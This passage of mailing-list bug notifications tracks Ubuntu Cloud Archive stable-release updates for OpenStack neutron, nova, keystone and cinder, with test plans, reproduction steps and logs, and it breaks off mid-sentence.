https://bugs.launchpad.net/bugs/2032770 Title: [SRU] [OVN] port creation with --enable-uplink-status-propagation does not work with OVN mechanism driver Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: [Impact] This SRU is a backport of https://review.opendev.org/c/openstack/neutron/+/892895 to the respective Ubuntu and UCA releases. The patch is merged to all the respective upstream branches (master & stable/[u,v,w,x,y,z,2023.1(a)]). This SRU intends to add the missing 'uplink-status-propagation' extension to ML2/OVN. This extension is already present and working in ML2/OVS, and it is supported by ML2/OVN, but the extension was never added to ML2/OVN. The patch simply adds the missing extension to ML2/OVN as well. The impact of this is visible for deployments migrating from ML2/OVS to ML2/OVN. The following command fails on ML2/OVN: ``` openstack port create --network 8d30fb08-2c6a-42fd-98c4-223d345c8c4f --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa # BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status' ``` The fix corrects this behavior by adding the missing extension. 
[Test Case] - Deploy a Focal/Yoga cloud: - ./generate-bundle.sh -s focal -r yoga --name test-focal-yoga-stack --run --ovn # After the dust settles - ./configure - source ./novarc - openstack port create --network --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa - It should fail with "BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status'" To confirm the fix, repeat the scenario and observe that the error disappears and port creation succeeds. [Regression Potential] The patch is quite trivial and should not affect any deployment negatively. The extension is optional and disabled by default. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2032770/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1978489] Re: libvirt / cgroups v2: cannot boot instance with more than 16 CPUs
This bug was fixed in the package nova - 3:25.2.1-0ubuntu2~cloud0 --- nova (3:25.2.1-0ubuntu2~cloud0) focal-yoga; urgency=medium . * New update for the Ubuntu Cloud Archive. . nova (3:25.2.1-0ubuntu2) jammy; urgency=medium . * d/p/libvirt-remove-default-cputune-shares-value.patch: Enable launch of instances with more than 9 CPUs on Jammy (LP: #1978489). ** Changed in: cloud-archive/yoga Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1978489 Title: libvirt / cgroups v2: cannot boot instance with more than 16 CPUs Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive yoga series: Fix Released Status in OpenStack Compute (nova): In Progress Status in nova package in Ubuntu: Fix Released Status in nova source package in Jammy: Fix Released Bug description: Description === Using the libvirt driver and a host OS that uses cgroups v2 (RHEL 9, Ubuntu Jammy), an instance with more than 16 CPUs cannot be booted. Steps to reproduce == 1. Boot an instance with 10 (or more) CPUs on RHEL 9 or Ubuntu Jammy using Nova with the libvirt driver. Expected result === Instance boots. Actual result = Instance fails to boot with a 'Value specified in CPUWeight is out of range' error. Environment === Originally reported as a libvirt bug in RHEL 9 [1] Additional information == This is happening because Nova defaults to 1024 * (# of CPUs) for the value of domain/cputune/shares in the libvirt XML. This is then passed directly by libvirt to the cgroups API, but cgroups v2 has a maximum value of 10000. 10000 / 1024 ~= 9.76 [1] https://bugzilla.redhat.com/show_bug.cgi?id=2035518 Ubuntu SRU Details: [Impact] See above. [Test Case] See above. [Regression Potential] We've had this change in other jammy-based versions of the nova package for a while now, including zed, antelope, bobcat. 
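The 9-to-10 CPU boundary follows directly from the numbers in the description. A quick sketch, with constants taken from the description (1024 shares per vCPU) and the cgroups v2 CPUWeight upper bound (10000); the helper function itself is illustrative:

```python
# Nova wrote 1024 * vCPUs into domain/cputune/shares; cgroups v2
# rejects any CPUWeight above 10000.
CGROUPS_V2_CPU_WEIGHT_MAX = 10000
SHARES_PER_VCPU = 1024

def boots_ok(vcpus):
    """True if the default shares value stays within CPUWeight range."""
    return SHARES_PER_VCPU * vcpus <= CGROUPS_V2_CPU_WEIGHT_MAX

# 10000 / 1024 ~= 9.76, so 9 vCPUs is the largest count that fits;
# 10 or more produces 'Value specified in CPUWeight is out of range'.
```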
To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1978489/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1998789] Please test proposed package
Hello Mustafa, or anyone else affected, Accepted keystone into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). 
https://bugs.launchpad.net/bugs/1998789 Title: [SRU] PooledLDAPHandler.result3 does not release pool connection back when an exception is raised Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in OpenStack Identity (keystone): Fix Released Status in keystone package in Ubuntu: Fix Released Status in keystone source package in Focal: Fix Released Status in keystone source package in Jammy: Fix Released Status in keystone source package in Lunar: Fix Released Bug description: [Impact] This SRU is a backport of https://review.opendev.org/c/openstack/keystone/+/866723 to the respective Ubuntu and UCA releases. The patch is merged to all the respective upstream branches (master & stable/[u,v,w,x,y,z]). This SRU intends to fix a denial-of-service bug that happens when keystone uses pooled LDAP connections. In pooled LDAP connection mode, keystone borrows a connection from the pool, performs the LDAP operation and releases the connection back to the pool. But if an exception or error happens while the LDAP connection is still borrowed, keystone fails to release the connection back to the pool, hogging it forever. If this happens for all the pooled connections, the connection pool will be exhausted and keystone will no longer be able to perform LDAP operations. The fix corrects this behavior by allowing the connection to be released back to the pool even if an exception/error happens during the LDAP operation. 
[Test Case] - Deploy an LDAP server of your choice - Fill it with enough data that the search takes more than `pool_connection_timeout` seconds - Define a keystone domain with the LDAP driver with following options: [ldap] use_pool = True page_size = 100 pool_connection_timeout = 3 pool_retry_max = 3 pool_size = 10 - Point the domain to the LDAP server - Try to log in to the OpenStack dashboard, or try to do anything that uses the LDAP user - Observe the /var/log/apache2/keystone_error.log, it should contain ldap.TIMEOUT() stack traces followed by `ldappool.MaxConnectionReachedError` stack traces To confirm the fix, repeat the scenario and observe that the "/var/log/apache2/keystone_error.log" does not contain `ldappool.MaxConnectionReachedError` stack traces and the LDAP operation in motion is successful (e.g. OpenStack Dashboard login) [Regression Potential] The patch is quite trivial and should not affect any deployment in a negative way. The LDAP pool functionality can be disabled by setting "use_pool=False" in case of any regression. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1998789/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1978489] Re: libvirt / cgroups v2: cannot boot instance with more than 16 CPUs
Re: > The same patch should also be available on cloud archive cloud:focal-yoga This will happen alongside the changes being made into 22.04 - the updates are in the yoga-proposed pocket at the moment. ** Also affects: cloud-archive Importance: Undecided Status: New ** Also affects: cloud-archive/yoga Importance: Undecided Status: New ** Changed in: cloud-archive Status: New => Invalid ** Changed in: cloud-archive/yoga Status: New => Fix Committed ** Changed in: cloud-archive/yoga Importance: Undecided => High ** Changed in: nova (Ubuntu Jammy) Importance: Undecided => High -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1978489 Title: libvirt / cgroups v2: cannot boot instance with more than 16 CPUs Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive yoga series: Fix Committed Status in OpenStack Compute (nova): In Progress Status in nova package in Ubuntu: Confirmed Status in nova source package in Jammy: Fix Committed Bug description: Description === Using the libvirt driver and a host OS that uses cgroups v2 (RHEL 9, Ubuntu Jammy), an instance with more than 16 CPUs cannot be booted. Steps to reproduce == 1. Boot an instance with 10 (or more) CPUs on RHEL 9 or Ubuntu Jammy using Nova with the libvirt driver. Expected result === Instance boots. Actual result = Instance fails to boot with a 'Value specified in CPUWeight is out of range' error. Environment === Originally reported as a libvirt bug in RHEL 9 [1] Additional information == This is happening because Nova defaults to 1024 * (# of CPUs) for the value of domain/cputune/shares in the libvirt XML. This is then passed directly by libvirt to the cgroups API, but cgroups v2 has a maximum value of 10000, and 10000 / 1024 ~= 9.76 [1] https://bugzilla.redhat.com/show_bug.cgi?id=2035518 Ubuntu SRU Details: [Impact] See above. [Test Case] See above. 
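The arithmetic behind the failure can be checked in a few lines, assuming the cgroups v2 `cpu.weight` upper bound of 10000 and Nova's historical default of 1024 shares per vCPU described above:

```python
# Back-of-the-envelope check: Nova's default of 1024 shares per vCPU
# crosses the cgroups v2 cpu.weight ceiling of 10000 at 10 vCPUs.
CPU_WEIGHT_MAX = 10_000   # cgroups v2 cpu.weight upper bound
SHARES_PER_VCPU = 1024    # Nova's historical default

def default_shares(vcpus):
    """Value Nova would put in domain/cputune/shares."""
    return SHARES_PER_VCPU * vcpus

for vcpus in (8, 9, 10, 16):
    shares = default_shares(vcpus)
    print(f"{vcpus:>2} vCPUs -> shares={shares:<6} "
          f"within cgroups v2 range: {shares <= CPU_WEIGHT_MAX}")

print("max vCPUs before overflow:", CPU_WEIGHT_MAX // SHARES_PER_VCPU)  # 9
```

This is why the reproduction step says "10 (or more) CPUs": 9 * 1024 = 9216 still fits, while 10 * 1024 = 10240 is rejected with the 'Value specified in CPUWeight is out of range' error.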
[Regression Potential] We've had this change in other jammy-based versions of the nova package for a while now, including zed, antelope, bobcat. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1978489/+subscriptions
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
This bug was fixed in the package cinder - 2:20.3.1-0ubuntu1.1~cloud0 --- cinder (2:20.3.1-0ubuntu1.1~cloud0) focal-yoga; urgency=medium . * New update for the Ubuntu Cloud Archive. . cinder (2:20.3.1-0ubuntu1.1) jammy; urgency=medium . * Revert driver assisted volume retype (LP: #2019190): - d/p/0001-Revert-Driver-assisted-migration-on-retype-when-it-s.patch ** Changed in: cloud-archive/yoga Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: Fix Released Status in cinder source package in Lunar: Won't Fix Status in cinder source package in Mantic: Fix Released Status in cinder source package in Noble: Fix Released Bug description: [Impact] See bug description for full details but short summary is that a patch landed in Wallaby release that introduced a regression whereby retyping an in-use volume leaves the attached volume in an inconsistent state with potential for data corruption. Result is that a vm does not receive updated connection_info from Cinder and will keep pointing to the old volume, even after reboot. 
[Test Plan]
* Deploy OpenStack with two Cinder RBD storage backends (different pools)
* Create two volume types
* Boot a vm from volume: openstack server create --wait --image jammy --flavor m1.small --key-name testkey --nic net-id=8c74f1ef-9231-46f4-a492-eccdb7943ecd testvm --boot-from-volume 10
* Retype the volume to type B: openstack volume set --type typeB --retype-policy on-demand
* Go to the compute host running the vm and check that the vm is now copying data to the new location e.g. b68be47d-f526-4f98-a77b-a903bf8b6c65 which will eventually settle and change to: b68be47d-f526-4f98-a77b-a903bf8b6c65
* And lastly a reboot of the vm should be successful.

[Regression Potential] Given that the current state is potential data corruption and the patch will fix this by successfully refreshing connection info I do not see a regression potential. It is in fact fixing a regression. - While trying out the volume retype feature in cinder, we noticed that after an instance is rebooted it will not come back online and be stuck in an error state or if it comes back online, its filesystem is corrupted. ## Observations Say there are two volume types `fast` (stored in ceph pool `volumes`) and `slow` (stored in ceph pool `volumes.hdd`). Before the retyping we can see that the volume is present in the `volumes.hdd` pool and has a watcher accessing the volume.

```sh
[ceph: root@mon0 /]# rbd ls volumes.hdd
volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9
[ceph: root@mon0 /]# rbd status volumes.hdd/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9
Watchers:
    watcher=[2001:XX:XX:XX::10ad]:0/3914407456 client.365192 cookie=140370268803456
```

Starting the retyping process using the migration policy `on-demand` for that volume either via the horizon dashboard or the CLI causes the volume to be correctly transferred to the `volumes` pool within the ceph cluster. However, the watcher does not get transferred, so nobody is accessing the volume after it has been transferred. 
```sh
[ceph: root@mon0 /]# rbd ls volumes
volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9
[ceph: root@mon0 /]# rbd status volumes/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9
Watchers: none
```

Taking a look at the libvirt XML of the instance in question, one can see that the `rbd` volume path does not change after the retyping is completed. Therefore, if the instance is restarted nova will not be able to find its volume, preventing an instance start.

Pre retype

```xml
[...]
[...]
```

Post retype (no change)

```xml
[...]
[...]
```
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
This bug was fixed in the package cinder - 2:21.3.1-0ubuntu1.1~cloud0 --- cinder (2:21.3.1-0ubuntu1.1~cloud0) jammy-zed; urgency=medium . * revert driver assister volume retype (LP: #2019190) - d/p/0001-Revert-Driver-assisted-migration-on-retype-when-it-s.patch ** Changed in: cloud-archive/zed Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: Fix Released Status in cinder source package in Lunar: Won't Fix Status in cinder source package in Mantic: Fix Released Status in cinder source package in Noble: Fix Released
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
This bug was fixed in the package cinder - 2:22.1.1-0ubuntu1.1~cloud0 --- cinder (2:22.1.1-0ubuntu1.1~cloud0) jammy-antelope; urgency=medium . * revert driver assister volume retype (LP: #2019190) - d/p/0001-Revert-Driver-assisted-migration-on-retype-when-it-s.patch ** Changed in: cloud-archive/antelope Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Committed Status in Ubuntu Cloud Archive zed series: Fix Committed Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: Fix Committed Status in cinder source package in Lunar: Won't Fix Status in cinder source package in Mantic: Fix Released Status in cinder source package in Noble: Fix Released
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
This bug was fixed in the package cinder - 2:23.0.0-0ubuntu1.1~cloud0 --- cinder (2:23.0.0-0ubuntu1.1~cloud0) jammy-bobcat; urgency=medium . * New update for the Ubuntu Cloud Archive. . cinder (2:23.0.0-0ubuntu1.1) mantic; urgency=medium . [ Corey Bryant ] * d/gbp.conf: Create stable/2023.2 branch. * d/gbp.conf, .launchpad.yaml: Sync from cloud-archive-tools for bobcat. . [ Edward Hope-Morley ] * revert driver assister volume retype (LP: #2019190) - d/p/0001-Revert-Driver-assisted-migration-on-retype-when-it-s.patch ** Changed in: cloud-archive/bobcat Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Committed Status in Ubuntu Cloud Archive zed series: Fix Committed Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: Fix Committed Status in cinder source package in Lunar: Won't Fix Status in cinder source package in Mantic: Fix Released Status in cinder source package in Noble: Fix Released
[Yahoo-eng-team] [Bug 1955578] Please test proposed package
Hello Arnau, or anyone else affected, Accepted neutron into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1955578 Title: OVN transaction could not be completed due to a race condition Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Triaged Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: When executing the test "test_connectivity_through_2_routers" it is highly possible to have a race condition: networking_ovn.common.exceptions.RevisionConflict: OVN revision number for {PORT_ID} (type: ports) is equal or higher than the given resource. Skipping update. 
Bugzilla reference: https://bugzilla.redhat.com/show_bug.cgi?id=1860448 = Ubuntu SRU Details = [Impact] See bug description. [Test Case] Deploy openstack with OVN. Run the test_connectivity_through_2_routers test from https://github.com/openstack/neutron-tempest-plugin. This could also be tested manually based on what that test does. Ensure the router port status is not set to DOWN at any point. [Where problems could occur] The existing bug could still occur if the assumption about specifying the port type is not correct. Presumably this is not the case, but that is a theoretical potential for where problems could occur. All of these patches have already landed in the corresponding upstream branches. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1955578/+subscriptions
[Yahoo-eng-team] [Bug 1961112] Please test proposed package
Hello Daniel, or anyone else affected, Accepted neutron into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1961112 Title: [ovn] overlapping security group rules break neutron-ovn-db-sync-util Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: Neutron (Xena) is happy to accept equivalent rules with overlapping remote CIDR prefix as long as the notation is different, e.g. 10.0.0.0/8 and 10.0.0.1/8. However, OVN is smarter, normalizes the prefix and figures out that they both are 10.0.0.0/8. 
This does not have any fatal effects in a running OVN deployment (creating and using such rules does not even trigger a warning) but upon running neutron-ovn-db-sync-util, it crashes and won't perform a sync. This is a blocker for upgrades (and other scenarios). Security group's rules:

$ openstack security group rule list overlap-sgr
+--------------------------------------+-------------+-----------+------------+------------+-----------+-----------------------+----------------------+
| ID                                   | IP Protocol | Ethertype | IP Range   | Port Range | Direction | Remote Security Group | Remote Address Group |
+--------------------------------------+-------------+-----------+------------+------------+-----------+-----------------------+----------------------+
| 3c41fa80-1d23-49c9-9ec1-adf581e07e24 | tcp         | IPv4      | 10.0.0.1/8 |            | ingress   | None                  | None                 |
| 639d263e-6873-47cb-b2c4-17fc824252db | None        | IPv4      | 0.0.0.0/0  |            | egress    | None                  | None                 |
| 96e99039-cbc0-48fe-98fe-ef28d41b9d9b | tcp         | IPv4      | 10.0.0.0/8 |            | ingress   | None                  | None                 |
| bf9160a3-fc9b-467e-85d5-c889811fd6ca | None        | IPv6      | ::/0       |            | egress    | None                  | None                 |
+--------------------------------------+-------------+-----------+------------+------------+-----------+-----------------------+----------------------+

Log excerpt:

16/Feb/2022:20:55:40.568 527216 INFO neutron.cmd.ovn.neutron_ovn_db_sync_util [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Sync for Northbound db started with mode : repair
16/Feb/2022:20:55:42.105 527216 INFO neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.extensions.qos [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Starting OVNClientQosExtension
16/Feb/2022:20:55:42.380 527216 INFO neutron.db.ovn_revision_numbers_db [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Successfully bumped revision number for resource 49b3249a-7624-4711-b271-3e63c6a27658 (type: ports) to 17
16/Feb/2022:20:55:43.205 527216 WARNING neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_db_sync [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] ACLs-to-be-added 1 ACLs-to-be-removed 0
16/Feb/2022:20:55:43.206 527216 WARNING neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_db_sync [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] ACL found in Neutron but not in OVN DB for port group pg_e90b68f3_9f8d_4250_9b6a_7531e2249c99
16/Feb/2022:20:55:43.208 527216 ERROR 
ovsdbapp.backend.ovs_idl.transaction [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/ovsdbapp/backend/ovs_idl/connection.py", line 131, in run
    txn.results.put(txn.do_commit())
  File "/usr/lib/python3/dist-packages/ovsdbapp/backend/ovs_idl/transaction.py", line 93, in do_commit
    command.
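The mismatch between Neutron and OVN described above can be reproduced with Python's standard `ipaddress` module, which normalizes a prefix the same way OVN does: the two "different" Neutron rules collapse into one network.

```python
# Illustration of the overlap: OVN normalizes the remote prefix, so
# 10.0.0.1/8 and 10.0.0.0/8 describe the same network, while Neutron
# stores them as two distinct security group rules.
import ipaddress

a = ipaddress.ip_network("10.0.0.0/8")
b = ipaddress.ip_network("10.0.0.1/8", strict=False)  # host bits set

print(a)        # 10.0.0.0/8
print(b)        # 10.0.0.0/8 -- normalized, identical to `a`
print(a == b)   # True: one ACL in OVN, two rules in Neutron
```

With `strict=True` (the default), `ip_network("10.0.0.1/8")` raises `ValueError` because of the set host bits; Neutron's acceptance of such notation is precisely what lets the two overlapping rules coexist until the sync utility trips over them.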
[Yahoo-eng-team] [Bug 2008943] Please test proposed package
Hello Miro, or anyone else affected, Accepted neutron into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2008943 Title: OVN DB Sync utility cannot find NB DB Port Group Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Triaged Status in Ubuntu Cloud Archive wallaby series: Triaged Status in Ubuntu Cloud Archive xena series: Triaged Status in neutron: In Progress Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: Runtime exception: ovsdbapp.backend.ovs_idl.idlutils.RowNotFound: Cannot find Port_Group with name=pg_aa9f203b_ec51_4893_9bda_cfadbff9f800 can occur while performing database sync between Neutron db and OVN NB db using neutron-ovn-db-sync-util. 
This exception occurs when the `sync_networks_ports_and_dhcp_opts()` function ends up implicitly creating a new default security group for a tenant/project id. This is normally OK but the problem is that `sync_port_groups` was already called and thus the port_group does not exist in NB DB. When `sync_acls()` is called later, no port group is found and the exception occurs. Quick way to reproduce on ML2/OVN:
- openstack project create test_project
- openstack network create --project test_project test_network
- openstack port delete $(openstack port list --network test_network -c ID -f value) # since this is an empty network only the metadata port should get listed and subsequently deleted
- openstack security group delete test_project

So now that you have a network without a metadata port in it and no default security group for the project/tenant that this network belongs to, run neutron-ovn-db-sync-util --config-file /etc/neutron/neutron.conf --config-file /etc/neutron/plugins/ml2/ml2_conf.ini --ovn-neutron_sync_mode migrate The exception should occur. Here is a more realistic scenario of how we can run into this with an ML2/OVS to ML2/OVN migration. I am also including why the code runs into it.
1. ML2/OVS environment with a network but no default security group for the project/tenant associated with the network
2. Perform ML2/OVS to ML2/OVN migration. This migration process will run neutron-ovn-db-sync-util with --migrate
3. During the sync we first sync port groups[1] from Neutron DB to OVN DB
4. Then we sync network ports [2]. The process will detect that the network in question is not part of OVN NB. It will create that network in the OVN NB db and along with that it will create a metadata port for it (an OVN network requires a metadata port). The Port_create call will implicitly notify _ensure_default_security_group_handler which will not find a security group for that tenant/project id and create one. 
Now you have a new security group with 4 new default security group rules. 5. When sync_acls [4] runs, it will pick up those 4 new rules, but the commit to the NB DB will fail since the port group (aka the security group) does not exist in the NB DB. [1] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L104 [2] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L10 [3] https://opendev.org/openstack/neutron/src/branch/master/neutron/db/securitygroups_db.py#L915 [4] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L107 = Ubuntu SRU Details = [Impact] See bug description. [Test Case] Deploy openstack with OVN. Follow steps in "Quick way to reproduce on ML2/OVN" from bug description. [Where problems could occur] The fix mitigate
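The ordering problem described above can be sketched in a few lines of plain Python. This is only an illustration of the race, not neutron's actual code; a set stands in for the OVN NB DB and a list for the security groups known to Neutron:

```python
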